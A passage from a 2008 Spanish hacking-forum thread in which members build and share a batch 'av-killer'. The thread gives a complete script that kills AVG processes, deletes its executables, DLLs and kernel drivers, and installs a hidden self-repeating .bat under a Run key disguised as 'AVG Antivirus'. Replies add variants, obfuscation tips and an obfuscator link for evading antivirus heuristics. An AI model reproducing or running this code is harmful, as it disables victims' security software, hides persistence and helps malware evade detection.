elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Que no detecten mi av-killer hecho en batch...		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: Que no detecten mi av-killer hecho en batch...  (Leído 13,849 veces)
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #20 en: 13 Mayo 2008, 00:12 am »
Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto:

Código:
set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h%

Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo?

Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar...
En línea




Dominio en venta: https://forojapones.com/
Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #21 en: 13 Mayo 2008, 00:23 am »
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

podrias probarlo asi tmb
saludos
En línea
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #22 en: 13 Mayo 2008, 00:28 am »
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)
En línea
"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #23 en: 13 Mayo 2008, 00:35 am »
Cita de: Darioxhcx en 13 Mayo 2008, 00:23 am
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"

Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas.

Cita de: Hendriҳ en 13 Mayo 2008, 00:28 am
Para saltar la heuristica utilizad esto: http://foro.elhacker.net/scripting/aporte_obfuscatebatch-t205084.0.html;msg974302

NOTA: Deben tener el framework del .Net instalado para poder ejecutar el ejecutable.

Un Saludo :)

Excelente, no lo había visto, lo estaré probando. Gracias :D

Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro :xD
En línea




Dominio en venta: https://forojapones.com/
MK-Ultra


Desconectado Desconectado

Mensajes: 435


~ Nevermind ~


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #24 en: 13 Mayo 2008, 02:31 am »
Cita de: Carloswaldo en 13 Mayo 2008, 00:35 am
Uso el Quick Batch file compiler

Bien ahí  ;)
En línea
Agradecer no cuesta nada (al menos no mucho)

BTC: 1DHKsWE6wGkUiHbKkwBDaF8DEGwn9n6nxQ
Carloswaldo
Traductor
Moderador Global
***
Desconectado Desconectado

Mensajes: 4.764


Nos reservamos el derecho de ban.


Ver Perfil WWW
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #25 en: 13 Mayo 2008, 21:46 pm »
Pues al parecer por fin lo he logrado, elimnando esos archivos en la carpeta de drivers.

Este es el código final:

Código:
::Avg Killer by Carloswaldo
@echo off
::Declaramos variables
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
set h=explorer.exe
set i=avgse.dll
set j=\system32\drivers
set k=avgmfx86.sys
set l=avgclean.sys
set m=avg7rsxp.sys
set n=avg7rsw.sys
set o=avgtdi.sys
set p=avg7core.sys
::Matamos los procesos del avg
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
::Vamos a donde está instalado el avg y borramos los .exe y .dll
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
::Matamos el explorer para matar un dll y un driver, volvemos a iniciar el explorer
taskkill /f /im %h%
del /f /q /s %i%
cd %windir%%j%
del /f /q /s %o%
del /f /q /s %p%
start %h%
::Matamos el resto de drivers
del /f /q /s %k%
del /f /q /s %l%
del /f /q /s %m%
del /f /q /s %n%
::Borramos la clave del registro por si las moscas...
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
::Creamos un bat que se iniciara siempre, solo por si acaso
cd %windir%
echo @echo off >> avg.bat
attrib +r +a +s +h avg.bat
echo set a=avgamsvr.exe >> avg.bat
echo set b=avgcc.exe >> avg.bat
echo set c=avgemc.exe >> avg.bat
echo set d=avgupsvc.exe >> avg.bat
echo set e=\Grisoft\AVG7 >> avg.bat
echo set f=*.exe* >> avg.bat
echo set g=*.dll* >> avg.bat
echo taskkill /f /im %a% >> avg.bat
echo taskkill /f /im %b% >> avg.bat
echo taskkill /f /im %c% >> avg.bat
echo taskkill /f /im %d% >> avg.bat
echo cd %programfiles%%e% >> avg.bat
echo del /f /q /s %f% >> avg.bat
echo del /f /q /s %g% >> avg.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f >> avg.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "AVG Antivirus" /d "%windir%\avg.bat" /f
exit

Hoy que inicie de nuevo el pc ya no me sale por ningun lado el cartelito de "Acceso denegado" ni nada por el estilo. ;D

Estaré buscando la forma de mejorar el código, e iré por el próximo av... ::)
En línea




Dominio en venta: https://forojapones.com/
$hyDow

Desconectado Desconectado

Mensajes: 45


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #26 en: 29 Mayo 2008, 00:38 am »
no seria mejor hacer
@echo off
SeT a=attrib
SeT b=-R
SeT c=-A
SeT d=-S
SeT e=Del /F /S /Q
SeT f=*.*
SeT g=cd
SeT i=-H
SeT {=ExiT
SeT 1=%ProgramFiles%\grisoft
%g%%1%
%a%%b%%c%%d%%e%%i%%f%
%e%%f%
%{%

digo yo, o tal vez usar ren *.* *
eso es mas original xD
pero me refiero a borrarlo todo...

$hyDow
En línea
Sai-To

Desconectado Desconectado

Mensajes: 180


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #27 en: 29 Mayo 2008, 02:29 am »
bueno si no te quieres complicar la vida poniendo como un becerro:

set var=...............
...................

hay crearon una utilidad para separarlo asi... la postee yo de skull! ;) y no se como es el de hendrix pero si los combinas lo dos y Batch Compiler seria buen aporte! ;)
En línea
$hyDow

Desconectado Desconectado

Mensajes: 45


Ver Perfil
Re: Que no detecten mi av-killer hecho en batch...
« Respuesta #28 en: 29 Mayo 2008, 20:09 pm »
hombre la aplicacion de hendrix es rebuena, pero tiene mas merito asi


$hyDow
En línea
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Cómo evitar que me detecten en... « 1 2 »
Redes 		bertitop 10 33,277 Último mensaje 17 Febrero 2012, 21:04 pm
por bertitop
Reproductor mp3 hecho en batch
Software 		**Aincrad** 0 1,322 Último mensaje 13 Junio 2017, 05:45 am
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines